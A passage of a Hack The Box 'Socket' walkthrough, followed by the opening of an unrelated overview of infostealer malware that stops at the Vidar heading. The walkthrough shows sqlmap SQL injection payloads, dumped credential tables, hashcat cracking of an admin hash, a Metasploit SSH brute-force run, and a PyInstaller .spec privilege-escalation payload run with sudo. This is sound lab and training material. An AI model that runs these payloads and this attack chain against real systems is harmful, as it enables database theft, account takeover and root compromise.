GET parameter 'version' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: version (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: version=0.0.2" AND 1458=1458-- gddH

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: version=0.0.2" AND 6925=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- MMbe

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: version=0.0.2" UNION ALL SELECT CHAR(113,98,98,106,113)||CHAR(97,100,107,108,90,74,75,68,112,104,76,90,84,85,119,84,117,117,89,109,103,112,74,72,116,88,74,72,72,80,99,122,110,107,67,122,122,72,115,81)||CHAR(113,98,113,98,113),NULL,NULL,NULL-- VJHs
---
[21:15:23] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[21:15:23] [WARNING] on SQLite it is not possible to enumerate databases (use only '--tables')
[21:15:23] [INFO] fetched data logged to text files under '/home/in7rud3r/.local/share/sqlmap/output/localhost'
[21:15:23] [WARNING] your sqlmap version is outdated

[*] ending @ 21:15:23 /2023-06-25/

From here everything should be simpler, let’s list the tables.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/hackthebox/_10.10.11.206 - Socket (lin)/attack/py]
└─$ sqlmap -u 'http://localhost:8081/version?version=0.0.2' --batch --level 5 --risk 3 --tables -DB SQLite
        ___
       __H__                                                                                                                         
 ___ ___[']_____ ___ ___  {1.6.7#stable}                                                                                             
|_ -| . [)]     | .'| . |                                                                                                            
|___|_  ["]_|_|_|__,|  _|                                                                                                            
      |_|V...       |_|   https://sqlmap.org                                                                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:21:56 /2023-06-25/

[21:21:56] [INFO] resuming back-end DBMS 'sqlite' 
[21:21:56] [INFO] testing connection to the target URL
[21:21:57] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.5')
[21:21:57] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: version (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: version=0.0.2" AND 1458=1458-- gddH

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: version=0.0.2" AND 6925=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- MMbe

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: version=0.0.2" UNION ALL SELECT CHAR(113,98,98,106,113)||CHAR(97,100,107,108,90,74,75,68,112,104,76,90,84,85,119,84,117,117,89,109,103,112,74,72,116,88,74,72,72,80,99,122,110,107,67,122,122,72,115,81)||CHAR(113,98,113,98,113),NULL,NULL,NULL-- VJHs
---
[21:21:57] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[21:21:57] [INFO] fetching tables for database: 'SQLite_masterdb'
<current>
[6 tables]
+-----------------+
| answers         |
| info            |
| reports         |
| sqlite_sequence |
| users           |
| versions        |
+-----------------+

[21:21:57] [INFO] fetched data logged to text files under '/home/in7rud3r/.local/share/sqlmap/output/localhost'
[21:21:57] [WARNING] your sqlmap version is outdated

[*] ending @ 21:21:57 /2023-06-25/

And let’s take a look inside the users table.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/hackthebox/_10.10.11.206 - Socket (lin)/attack/py]
└─$ sqlmap -u 'http://localhost:8081/version?version=0.0.2' --dump -D SQLite -T users
        ___
       __H__                                                                                                                         
 ___ ___[']_____ ___ ___  {1.6.7#stable}                                                                                             
|_ -| . [,]     | .'| . |                                                                                                            
|___|_  [.]_|_|_|__,|  _|                                                                                                            
      |_|V...       |_|   https://sqlmap.org                                                                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:28:20 /2023-06-25/

[21:28:21] [INFO] resuming back-end DBMS 'sqlite' 
[21:28:21] [INFO] testing connection to the target URL
[21:28:21] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.5')
[21:28:21] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: version (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: version=0.0.2" AND 1458=1458-- gddH

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: version=0.0.2" AND 6925=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- MMbe

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: version=0.0.2" UNION ALL SELECT CHAR(113,98,98,106,113)||CHAR(97,100,107,108,90,74,75,68,112,104,76,90,84,85,119,84,117,117,89,109,103,112,74,72,116,88,74,72,72,80,99,122,110,107,67,122,122,72,115,81)||CHAR(113,98,113,98,113),NULL,NULL,NULL-- VJHs
---
[21:28:21] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[21:28:21] [INFO] fetching columns for table 'users' 
[21:28:21] [INFO] fetching entries for table 'users'
[21:28:21] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to crack them via a dictionary-based attack? [Y/n/q] 
[21:28:36] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[21:28:42] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] 
[21:28:46] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[21:28:46] [INFO] starting 4 processes 
[21:28:55] [WARNING] no clear password(s) found                                                                                     
Database: <current>
Table: users
[1 entry]
+----+-------+----------------------------------+----------+
| id | role  | password                         | username |
+----+-------+----------------------------------+----------+
| 1  | admin | 0c090c365fa0559b151a43e0fea39710 | admin    |
+----+-------+----------------------------------+----------+

[21:28:55] [INFO] table 'SQLite_masterdb.users' dumped to CSV file '/home/in7rud3r/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/users.csv'                                                                                                                   
[21:28:55] [INFO] fetched data logged to text files under '/home/in7rud3r/.local/share/sqlmap/output/localhost'
[21:28:55] [WARNING] your sqlmap version is outdated

[*] ending @ 21:28:55 /2023-06-25/

Nothing simpler (if the password is one of the rockyou dictionary). Save just the string to a file, and hashcat will do the rest.

┌──(in7rud3r㉿in7rud3r-kali)-[/tmp/hc]
└─$ hashcat -a 0 -m 0 -O pwd_only.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.5) starting

[...]
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

[...]
0c090c365fa0559b151a43e0fea39710:denjanjade122566         
[...]

Started: Wed Jun 28 22:43:43 2023
Stopped: Wed Jun 28 22:44:04 2023

Well, I have a password. What about the account? Something “kavigihan” in it? Let’s try!

┌──(in7rud3r㉿in7rud3r-kali)-[~/Downloads/app]
└─$ ssh kavigihan@10.10.11.206                                              
The authenticity of host '10.10.11.206 (10.10.11.206)' can't be established.
ED25519 key fingerprint is SHA256:LJb8mGFiqKYQw3uev+b/ScrLuI4Fw7jxHJAoaLVPJLA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.206' (ED25519) to the list of known hosts.
kavigihan@10.10.11.206's password: 
Permission denied, please try again.

So, let’s take a look at the other tables.

Table: reports
[2 entries]
+----+---------------------------+---------------------------------------------------------------------------------------------------------------------+---------------+---------------+
| id | subject                   | description                                                                                                         | reported_date | reporter_name |
+----+---------------------------+---------------------------------------------------------------------------------------------------------------------+---------------+---------------+
| 1  | Accept JPEG files         | Is there a way to convert JPEG images with this tool? Or should I convert my JPEG to PNG and then use it?           | 13/08/2022    | Jason         |
| 2  | Converting non-ascii text | When I try to embed non-ascii text, it always gives me an error. It would be nice if you could take a look at this. | 22/09/2022    | Mike          |
+----+---------------------------+---------------------------------------------------------------------------------------------------------------------+---------------+---------------+

The reports table went relatively well, it was a bit longer the process for the answers table. Luckily, it’s only two records, worth the wait!

┌──(in7rud3r㉿in7rud3r-kali)-[~/Downloads/app]
└─$ sqlmap -u 'http://localhost:8081/version?version=0.0.2' --dump -D SQLite -T answers
        ___
       __H__                                                                                                                         
 ___ ___[.]_____ ___ ___  {1.6.7#stable}                                                                                             
|_ -| . [(]     | .'| . |                                                                                                            
|___|_  [(]_|_|_|__,|  _|                                                                                                            
      |_|V...       |_|   https://sqlmap.org                                                                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:12:56 /2023-06-28/

[23:12:56] [INFO] resuming back-end DBMS 'sqlite' 
[23:12:56] [INFO] testing connection to the target URL
[23:12:57] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.5')
[23:12:57] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: version (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: version=0.0.2" AND 1458=1458-- gddH

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: version=0.0.2" AND 6925=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- MMbe

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: version=0.0.2" UNION ALL SELECT CHAR(113,98,98,106,113)||CHAR(97,100,107,108,90,74,75,68,112,104,76,90,84,85,119,84,117,117,89,109,103,112,74,72,116,88,74,72,72,80,99,122,110,107,67,122,122,72,115,81)||CHAR(113,98,113,98,113),NULL,NULL,NULL-- VJHs
---
[23:12:57] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[23:12:57] [INFO] fetching columns for table 'answers' 
[23:12:57] [INFO] fetching entries for table 'answers'
[23:12:59] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'    
[23:12:59] [INFO] fetching number of entries for table 'answers' in database 'SQLite_masterdb'
[23:12:59] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:12:59] [INFO] retrieved: 2
[23:13:02] [INFO] retrieved: 
[23:13:03] [WARNING] time-based comparison requires larger statistical model, please wait.............. (done)                      
[23:13:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 

[23:13:08] [INFO] retrieved: Hello Json,  As if now we support PNG formart only. We will be adding JPEG/SVG file formats in our next version.  Thomas Keller
[23:18:12] [INFO] retrieved: admin
[23:18:24] [INFO] retrieved: 17/08/2022
[23:18:50] [INFO] retrieved: 1
[23:18:54] [INFO] retrieved: 
[23:18:55] [INFO] retrieved: 
[23:18:56] [INFO] retrieved: PENDING
[23:19:14] [INFO] retrieved: 
[23:19:15] [INFO] retrieved: 
[23:19:16] [INFO] retrieved: Hello Mike,   We have confirmed a valid problem with handling non-ascii charaters. So we suggest you to stick with ascci printable characters for now!  Thomas Keller
[23:25:36] [INFO] retrieved: admin
[23:25:48] [INFO] retrieved: 25/09/2022
[23:26:14] [INFO] retrieved: 2
[23:26:17] [INFO] retrieved: 
[23:26:18] [INFO] retrieved: 
[23:26:19] [INFO] retrieved: PENDING
Database: <current>
Table: answers
[2 entries]
+----+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+---------+-------------+---------------+
| id | report_id | answer                                                                                                                                                                    | status  | FOREIGN | answered_by | answered_date |
+----+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+---------+-------------+---------------+
| 1  | <blank>   | Hello Json,nnAs if now we support PNG formart only. We will be adding JPEG/SVG file formats in our next version.nnThomas Keller                                       | PENDING | <blank> | admin       | 17/08/2022    |
| 2  | <blank>   | Hello Mike,nn We have confirmed a valid problem with handling non-ascii charaters. So we suggest you to stick with ascci printable characters for now!nnThomas Keller | PENDING | <blank> | admin       | 25/09/2022    |
+----+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+---------+-------------+---------------+

[23:26:37] [INFO] table 'SQLite_masterdb.answers' dumped to CSV file '/home/in7rud3r/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/answers.csv'                                                                                                               
[23:26:37] [INFO] fetched data logged to text files under '/home/in7rud3r/.local/share/sqlmap/output/localhost'
[23:26:37] [WARNING] your sqlmap version is outdated

[*] ending @ 23:26:37 /2023-06-28/

It seems that the DB collects user reports and allows support users to keep track of the answers given to requests received. Interestingly, there was a user Thomas, with the administrator role. The basic idea is to generate a list of accounts based on the possible combinations of the name and surname of this user, it will be enough to find a suitable tool to generate a dictionary with which to perform a brute-forcing.

GitHub – jseidl/usernamer: Pentest Tool to generate usernames/logins based on supplied names.
Pentest Tool to generate usernames/logins based on supplied names. – GitHub – jseidl/usernamer: Pentest Tool to generate usernames/logins based on supplied names.
HTB Socket Walkthrough

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.206 - Socket (lin)/attack/git/usernamer]
└─$ python2 usernamer.py -n "Thomas Keller" -l > accountlistgenerated.txt

And now, let’s start to brute force using metasploit.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.206 - Socket (lin)/attack/git/usernamer]
└─$ msfconsole                        
[...]
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, use
                                                r&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/us
                                                ing-metasploit.html
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 10.10.11.206
rhosts => 10.10.11.206
msf6 auxiliary(scanner/ssh/ssh_login) > set password denjanjade122566
password => denjanjade122566
msf6 auxiliary(scanner/ssh/ssh_login) > set stop_on_success true
stop_on_success => true
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file ./accountlistgenerated.txt
user_file => ./accountlistgenerated.txt
msf6 auxiliary(scanner/ssh/ssh_login) > exploit 

[*] 10.10.11.206:22 - Starting bruteforce
[+] 10.10.11.206:22 - Success: 'tkeller:denjanjade122566' 'uid=1001(tkeller) gid=1001(tkeller) groups=1001(tkeller),1002(shared) Linux socket 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 1 opened (10.10.14.205:42467 -> 10.10.11.206:22) at 2023-06-29 00:07:56 +0200
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Et voilà… the first flag.

┌──(in7rud3r㉿in7rud3r-kali)-[~/Dropbox/hackthebox]
└─$ ssh tkeller@10.10.11.206 
tkeller@10.10.11.206's password: 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-67-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jun 29 07:55:10 AM UTC 2023

  System load:           0.0
  Usage of /:            54.3% of 8.51GB
  Memory usage:          12%
  Swap usage:            0%
  Processes:             222
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.206
  IPv6 address for eth0: dead:beef::250:56ff:feb9:898d


 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

tkeller@socket:~$ cat user.txt 
7******************************6

For the clue to the privesc, we don’t have to go too far either.

tkeller@socket:~$ sudo -l
Matching Defaults entries for tkeller on socket:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty

User tkeller may run the following commands on socket:
    (ALL : ALL) NOPASSWD: /usr/local/sbin/build-installer.sh
tkeller@socket:~$ cat /usr/local/sbin/build-installer.sh
#!/bin/bash
if [ $# -ne 2 ] && [[ $1 != 'cleanup' ]]; then
  /usr/bin/echo "No enough arguments supplied"
  exit 1;
fi

action=$1
name=$2
ext=$(/usr/bin/echo $2 |/usr/bin/awk -F'.' '{ print $(NF) }')

if [[ -L $name ]];then
  /usr/bin/echo 'Symlinks are not allowed'
  exit 1;
fi

if [[ $action == 'build' ]]; then
  if [[ $ext == 'spec' ]] ; then
    /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
    /home/svc/.local/bin/pyinstaller $name
    /usr/bin/mv ./dist ./build /opt/shared
  else
    echo "Invalid file format"
    exit 1;
  fi
elif [[ $action == 'make' ]]; then
  if [[ $ext == 'py' ]] ; then
    /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
    /root/.local/bin/pyinstaller -F --name "qreader" $name --specpath /tmp
   /usr/bin/mv ./dist ./build /opt/shared
  else
    echo "Invalid file format"
    exit 1;
  fi
elif [[ $action == 'cleanup' ]]; then
  /usr/bin/rm -r ./build ./dist 2>/dev/null
  /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
  /usr/bin/rm /tmp/qreader* 2>/dev/null
else
  /usr/bin/echo 'Invalid action'
  exit 1;
fi

So, let’s analyze the script, it accepts two parameters or one provided it contains the word “cleanup“. The second parameter is passed to the awk command, which splits it using the dot (.) as separator and takes the last value. A quick check on a possible symlink (they want to make things difficult to us). At this point, the only actions allowed by the script are: build, make or cleanup. The last one simply deletes some folders. Let’s see in detail the build and the make. And here is explained the split of the second parameter on the point, which turns out to be the name of a file. If the file extension is therefore “spec” in the case of action build or “py” in the case of action make, then the script continues, otherwise it stops showing an error message. In both cases, the “pyinstaller” command is started (which creates an executable binary) and subsequently copied together with the “.build” and “.dist” folders in the /opt/shared folder. Well, there are two possible attack points: the “awk” command and the “pyinstaller” command. Let’s see what we can do. My first approach is the awk command, which I’ve already seen on the GTFOBin portal.

awk | GTFOBins

As much as I go around it, I can’t find anything that can be exploited in this specific scenario. Let’s move on to the “pyinstaller” command. I remember something about it, especially the file used in the build, i.e., the .spec file, but I need to refresh this.

Using Spec Files — PyInstaller 5.13.0 documentation
HTB Socket Walkthrough

OK. Clear, but I don’t have enough experience with this type of script to prepare a valid payload… let’s see if chatGPT can help me!

Meanwhile, a simple python script that is useless.

def sum(a, b):
    return a + b

num1 = float(input("Insert first number: "))
num2 = float(input("Insert second number: "))

result = sum(num1, num2)
print("Result is:", result)

The malicious script containing root flag captures!

import subprocess

def run_command(command):
    process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    output, error = process.communicate()
    return output.decode().strip()

run_output = run_command("cat /root/root.txt")
print("Output del comando: ", run_output)

a = Analysis(['script.py'],
             pathex=['path_del_file'],
             binaries=[],
             datas=[],
             )

And we execute the attack with root privileges.

tkeller@socket:~/tmp$ sudo /usr/local/sbin/build-installer.sh build script.spec 
124 INFO: PyInstaller: 5.6.2
124 INFO: Python: 3.10.6
127 INFO: Platform: Linux-5.15.0-67-generic-x86_64-with-glibc2.35
132 INFO: UPX is not available.
Output del comando:  7******************************d
136 INFO: Extending PYTHONPATH with paths
['/home/tkeller/tmp', '/home/tkeller/tmp/path_del_file']
451 INFO: checking Analysis
451 INFO: Building Analysis because Analysis-00.toc is non existent
451 INFO: Initializing module dependency graph...
453 INFO: Caching module graph hooks...
458 WARNING: Several hooks defined for module 'numpy'. Please take care they do not conflict.
461 INFO: Analyzing base_library.zip ...
1292 INFO: Loading module hook 'hook-heapq.py' from '/root/.local/lib/python3.10/site-packages/PyInstaller/hooks'...
1381 INFO: Loading module hook 'hook-encodings.py' from '/root/.local/lib/python3.10/site-packages/PyInstaller/hooks'...
2886 INFO: Loading module hook 'hook-pickle.py' from '/root/.local/lib/python3.10/site-packages/PyInstaller/hooks'...
4217 INFO: Caching module dependency graph...
4329 INFO: running Analysis Analysis-00.toc
4362 INFO: Analyzing /home/tkeller/tmp/script.py
4363 INFO: Processing module hooks...
4373 INFO: Looking for ctypes DLLs
4376 INFO: Analyzing run-time hooks ...
4378 INFO: Including run-time hook '/root/.local/lib/python3.10/site-packages/PyInstaller/hooks/rthooks/pyi_rth_inspect.py'
4380 INFO: Including run-time hook '/root/.local/lib/python3.10/site-packages/PyInstaller/hooks/rthooks/pyi_rth_subprocess.py'
4384 INFO: Looking for dynamic libraries
4899 INFO: Looking for eggs
4899 INFO: Python library not in binary dependencies. Doing additional searching...
4920 INFO: Using Python library /lib/x86_64-linux-gnu/libpython3.10.so.1.0
4922 INFO: Warnings written to /home/tkeller/tmp/build/script/warn-script.txt
4939 INFO: Graph cross-reference written to /home/tkeller/tmp/build/script/xref-script.html

Wooo. Amazing. Quite a piece of cake! Well, that’s all, folks. I’ll meet you at the next BOX. Have a nice hacking! Bye!

Secjuice – ​Read More

Infostealers: An Overview

What are Infostealers?

Infostealers: An Overview

An infostealer is malicious software designed to infiltrate computer systems and extract valuable information from compromised devices. These malware programs operate covertly (not like some malware that perhaps gives pop-ups or noticeably hamper system performance) to collect sensitive data.

For a shorter description, an infostealer is malware that covertly steals secret information from a computer.

 Our computers have tons of sensitive information tucked away – passwords in the browser, cookies with connection tokens, files with sensitive information saved (how many people do you think have a text file saved with a name like “passwords” or “private”?), PDFs with their recovery key codes, Word documents with their banking information – to name a few.

 And in every operating system, there are typical “hidden” places with loads of information about that computer (e.g., Windows registry, Linux /etc, /usr, /bin).

Those are the items that infostealers are after.

Typical Techniques

Infostealers use varied techniques for system infiltration and data extraction. These techniques include but aren’t limited to phishing, infected websites, malicious software downloads (e.g., video game mods, pirated software), and exploiting system vulns.

 Once installed, infostealers harvest data via methods like browser hooking, web injection scripts, form grabbing, keylogging, clipboard hijacking, screen capturing (ironically, this sounds like Microsoft’s recent Recall feature), and browser session hijacking.

Some more specific information

After infecting a computer, infostealers use various the following techniques (including, but not limited to) to acquire data. These include:

  1. Credentials: Credentials are a significant target, providing the quickest and easiest way for the criminal element to access computers. These stolen creds are used to collect login links, usernames, and even passwords stored in the browser.
  2. Cookies: Cookies enable malicious actors to access a logged-in session, bypassing security measures like MFA/2FA.
  3. Documents and text files: Infostealers discover and target high-risk files containing confidential information such as financial, intellectual property, server passwords, and crypto private keys.
  4. Machine-specific properties: These properties include computer name, operating system, IP address, date and pathway of infection, as well as existing antivirus and installed applications. It’s their way of doing recon!

Anatomy of an Infostealer

Bot Framework

The bot framework is an essential component of many infostealers, designed to operate on many victim machines for infection distribution. Here are key aspects of the Bot Framework:

1.     Configurability: The framework includes a builder allowing attackers to customize the infostealer’s behavior on the target computer. This enables them to specify the data to collect and how the malware should operate.

2.     Data collection capabilities: Bot frameworks typically include modules for:

·                Harvesting browser data (passwords, cookies, autofill information)

·                Extracting credentials from various applications

·                Capturing keystrokes

·                Taking screenshots

·                Gathering system information

3. Stealth: Infostealers are designed to be lightweight and stealthy, leaving a minimal footprint on the infected system.

4. Exfiltration: The bot framework is responsible for sending the collected data back to the attacker’s command and control (C2) server.

5. Versioning: Some sophisticated bot frameworks, like the one used in the Jupyter infostealer, implement a versioning matrix to manage different malware versions.

6. More advanced Bot frameworks may include capabilities for:

·       Downloading and executing additional malware

·       Running PowerShell scripts and commands

·       Process hollowing (for injecting malicious code into apps)

7. Compatibility: Bot frameworks are often designed to work across multiple Windows versions and system architectures. For example, the Continental Stealer is compatible with systems from Windows 7 (x32) to Windows 11 (x64) and supports both ARM and x86-x64 architectures.

8. Anti-detection features: Some bot frameworks incorporate anti-VM capabilities to evade detection when running in virtual environments and self-destruct mechanisms to remove traces after execution.

Here’s a pictorial and general overview of a bot framework: 

Infostealers: An Overview

And of the attack lifecycle:

 

Infostealers: An Overview

All in the Family

Infostealers are technically malware, which we often think of as a product – like buying an office suite or photo editing program – and is, more technically, Malware-as-a-Service (MaaS) because one can pay $130-$750 for Vidar infostealer, for example – depending on the license – to get it from a vendor. But it’s often also referred to as if certain ones are their own entity, family, distributor, reseller, market, campaign, and threat actor. Here, I’ll talk about infostealers in both ways, not focusing on whether or not it’s the malware or threat actor.

Some of the most prevalent infostealer families include Raccoon, RedLine, AgentTesla, Vidar, and AZOrult.

One example of the sophistication of MaaS is the stealer  Rhadamanthys (here’s quick overview of it, with Yara rules at the bottom of the page if you need that to search for activity).

Rhadamanthys has instructional videos on Vimeo about how to use it. 

Infostealers: An Overview

The Top 3?

What are the main ones to be aware of and protect against? There’s no way to determine “Who’s or What’s the most dangerous?” It’s like asking, “What’s the best band?” or “What’s the worst company?” There are so many technical details and subjective experiences that calling something “worst” or best” is not quantifiable. For infostealers, some are spun up and then dismantled, others are used prominently for a while and then placed in the malware junk drawer; some are for mobile, some for specific industries, and others are OS-specfic.

But to focus a little, 3 of the top infostealers are:

1.     Raccoon

2.     Redline

3.     Vidar

Raccoon

Raccoon Infostealer, first observed in April 2019, is a popular and effective Malware-as-a-Service (MaaS). Raccoon targets a wide range of sensitive information – such as login credentials, credit card details, cookies, browser history, and autofill information. Written in C++, Raccoon employs a modular approach to infect both 32-bit and 64-bit Windows-based systems, using process injection techniques to hijack legitimate processes like explorer.exe and gain elevated privileges.

What makes Raccoon particularly dangerous is its comprehensive data collection capabilities. The malware gathers detailed system information, including operating system architecture, version, system language, hardware details, and installed applications. It can also capture screenshots if enabled by the attacker’s configuration. Raccoon follows a standard procedure for each targeted application: locating and copying cache files containing sensitive data, extracting and encrypting the information, and storing it in its main operating directory. After collecting data, Raccoon compresses all stolen information into a single zip file and exfiltrates it to its command-and-control (C2) server, typically using Telegraph or Discord for C2 operations.

Monitoring for Raccoon Stealer

To identify and mitigate the threat of Raccoon Infostealer, several indicators and behaviors can be monitored:

Raccoon Stealer v2 infections are characterized by unusual HTTP requests with empty Host headers and abnormal User Agent headers. The malware frequently changes its User Agent strings to evade detection, making anomaly-based detection methods crucial.

The malware contacts its command-and-control (C2) server using HTTP GET and POST requests, often to highly unusual IP addresses. These requests can include downloading DLL libraries and exfiltrating stolen data.

Upon infection, Raccoon Stealer fingerprints the target system, gathering information such as the operating system architecture, version, system language, hardware details, and installed applications. It uses functions like `RegQueryValueExW` and `GetUserNameW` to retrieve machine IDs and usernames.

The malware collects sensitive data, including browser autofill passwords, history, cookies, credit card details, usernames, passwords, and data from cryptocurrency wallets. It then compresses this data into a zip file (often named `Log.zip`) and sends it to the C2 server via an HTTP POST request.

Raccoon Stealer uses process injection techniques to hijack legitimate processes like `explorer.exe` and gain elevated privileges.

Raccoon Stealer was hampered in 2022 with the arrest of one of its main developers, who then pleaded guilty in 2024. But it’s still active.

Redline

RedLine Stealer, first discovered in 2020, has become one of the most notorious and widely used information-stealing malware in recent years. Operating on a Malware-as-a-Service (MaaS) model, RedLine allows cybercriminals to purchase a turnkey solution for stealing sensitive data from infected systems. This infostealer is capable of harvesting a wide range of information, including saved credentials, autocomplete data, and credit card details from web browsers, as well as data from cryptocurrency wallets, FTP clients, and popular messaging applications like Discord and Telegram.

What makes RedLine particularly dangerous is its ability to gather detailed system information, such as the victim’s IP address, operating system details, installed antivirus software, and hardware configuration. This comprehensive data collection allows attackers to build detailed profiles of their victims and potentially use the stolen information for further malicious activities, including identity theft, financial fraud, or as a stepping stone for more sophisticated attacks like ransomware. The effectiveness and relatively low cost of RedLine have contributed to its popularity among cybercriminals, making it a significant threat in the current cybersecurity landscape.

Redline TTPs

More details on these TTPs can be found at Infostealers.com https://www.infostealers.com/technique/redline-stealer/

T1087, T1071, T1020, T1059, T1555.003, T1132, T1005, T1140, T1573, T1041, T1083, T1562, T1105, T1056, T1095, T1571, T1003, T1120, T1566, T1057, T1055, T1012, T1113, T1518, T1528, T1539, T1082, T1614, T1007, T1124, T1552, T1204

Vidar

